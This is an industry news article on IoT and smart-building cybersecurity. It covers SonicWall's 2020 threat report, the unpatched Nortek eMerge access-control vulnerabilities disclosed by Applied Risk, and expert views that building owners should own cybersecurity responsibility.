“The boundaries of your digital empire are limitless. What was once a finite and defendable space is now a boundless territory — a vast, sprawling footprint of devices, apps, appliances, servers, networks, clouds, and users,” says Bill Conner, president and CEO of cybersecurity solution provider SonicWall, on the changing landscape of cybersecurity in buildings.
“For the cybercriminals, it’s more lawless than ever. Despite the best intentions of government agencies, law enforcement, and oversight groups, the current cyber threat landscape is more agile than ever before,” Conner continues. “To survive, you have to be faster, smarter and more decisive. And that’s not easy to do alone — even for larger organizations with substantial cybersecurity budgets.”
SonicWall recently released its 2020 Cyber Threat Report that tracks the volume and style of cyberattacks around the world. While they found a decrease in traditional ransomware and malware attacks in 2019, down 6% from 2018, they also saw a marked increase in intrusion attempts, encrypted threats, web app attacks, and IoT malware. Overall, there has been a general trend away from “untargeted salvos” by cybercriminals in favor of more evasive attacks against “softer” targets — such as IoT malware against our connected smart building devices.
“In 2019, SonicWall Capture Labs threat researchers discovered a moderate 5% increase in IoT malware, with total volume reaching 34.3 million attacks. But with a deluge of new IoT devices connecting each day, increases in IoT malware attacks should not only be expected, but planned for,” reads the new SonicWall report. “Given the tenuous landscape regarding data privacy, and the fact that everything from nanny cams to doorbells are connected, IoT focused attacks will only increase in 2020 and beyond.”
In May 2019, 10 vulnerabilities were exposed in smart door/building access control systems made by Nortek Security & Control (NSC) by whitehat cybersecurity advisory Applied Risk. The vulnerabilities included cross-site scripting, command injection, weak default hard-coded credentials, privilege escalation, authorization bypass, request forgery, directory traversal, stack-based buffer overflow, and root access over SSH. Ultimately, this meant that hackers could take control of vulnerable systems to launch Distributed Denial of Service (DDoS) attacks.
A DDoS attack uses a network of devices infected with a special malware, known as a “botnet,” that are synchronized to barrage a specific server with a massive amount of traffic until it collapses under the strain. Most of the hackers targeting NSC systems focused on the Linear eMerge E3 platform and the most prominent exploitation method involved command injection, where hackers execute commands remotely via specially-crafted HTTP requests. This process eventually results in the downloading of malware that can turn the target machine into a DDoS bot.
Six of the 10 vulnerabilities that were discovered by Applied Risk in May 2019 were classified as “highly critical” (9.8 or 10 out of a maximum of 10), but the NSC still chose to ignore the security advisory. Six months later, last November, Applied Risk released a proof of concept, giving hackers had everything they need to hijack these systems. Meaning the 2,375 active eMerge systems, based in over 100 countries around the world, have been highly vulnerable since. The vulnerabilities not only enable DDoS attacks but also serve as entry points for deeper infiltration into the corporate network, and all because of the OEM failures.
“For as long as the Nortek Security and Control insists on ignoring the problems and choosing not to issue a fixing patch for the eMerge, the firms that deploy these systems should take then offline immediately. If that’s impossible, admins are advised to set up a strict firewall or a VPN to limit the access of hackers to the vulnerable terminals,” says Bill Toulas, writing for TechNadu. “Since the NSC hasn’t made an official statement about this, it is unknown when and even if they are planning to fix the 10 flaws that are still plaguing eMerge.”
The NSC access control vulnerabilities, and similar OEM failures, highlight some of the issues facing the development of cybersecurity for the IoT but that is by no means the end of the story. While it would be great if all products leave the manufacturing facility with a high level of security, those products are then purchased, installed, maintained, and operated by various parties that could identify or rectify the security flaw. Slowly but surely the responsibility for cybersecurity is filtering through an industry that is beginning to understand their role in protecting their buildings.
“I think there has been quite an awakening. Last year people were very interested in the cybersecurity topic, now they are really engaged in actionable items, trying to figure out the product management strategies on the OEM side and building owners are trying to figure out what it means to their organizations. Security is a very large and open question, people don’t know where to start,” said Jim Lee, founder & CEO of Cimetrics during a Memoori webinar last week.
As our physical environments become digital spaces full of connected devices, the opportunity for such attacks continues to grow. The blame is often being placed on the OEM but smart buildings must also step up their cybersecurity game if they are to protect themselves from attack or prevent their devices being used as ammunition for attacks against others. Yet, in most buildings, there is no clear plan, budget, or line of responsibility to follow up on cybersecurity issues. Cybersecurity does not come preinstalled, it is a process that must be monitored, managed, and invested in continuously.
“As cybersecurity is a process, not a project or a product, it cannot be financed in the same way we build buildings, where everything is contemplated as a capital asset upfront, and not another penny is spent over the lifecycle,” Lee continued during the webinar. “IT changes at three-year intervals and buildings change at 30-year intervals, so the question is ‘who has the budget to pay for ongoing security?’ There is a thought process that leads to IT paying for that but we haven’t made that jump into hyperspace where IT has the budgets to pay for that kind of thing.”
Among other building security issues, the webinar on Cybersecurity discussed the topic of who is going to pay for and manage cybersecurity and what that means. It highlighted that IT departments may manage the networks but they are often not financially equipped to protect buildings from these kinds of attacks. Facilities management organizations handle the various devices being targetted but lack cyber expertise. Considering the ongoing nature of cyberthreats, many in the industry believe that the responsibility of cybersecurity should ultimately fall to the building owner.
“When thinking about who owns this thing and who should be at the top of the pyramid, it really has to be the building owner ultimately,” said Steve Fey, CEO of Totem Building Cybersecurity. “It is important that the owner assumes overall responsibility for cybersecurity, particularly when you get into respond and recover. If they haven’t thought through the cybersecurity policies and procedures then they will be caught unprepared when the event occurs and no one will look good in that process. So we encourage that the owners assume the role of the accountable party in this effort.”
The smart building is a digital entity and must have a strong focus on cybersecurity. The smart building owner is ultimately responsible for the protection of that digital space. As buildings evolve so must their owners, be that for accuracy of data collection and use, occupant health and safety, or cybersecurity. Unless someone takes responsibility for protecting building systems from cyberattacks, everyone will look to the owner for answers when that inevitable hack happens. It is up to the owner to make cybersecurity a priority and a team effort.
“The challenge with cyber is that it is multifaceted and it affects the entire chain of parties that make up a building. It starts with the owner, it moves into facilities organization, and you have the manufacturers who provide the various systems. Most importantly it has to involve the contractors who provide, install, and service these systems,” Fey said during last week’s webinar. “Our industry is at the beginning of this journey. We are now waking up to the fact that these systems are being hacked more and more, raising a fundamental question of who owns the problem. The simple answer to that is that we all have a part to play.”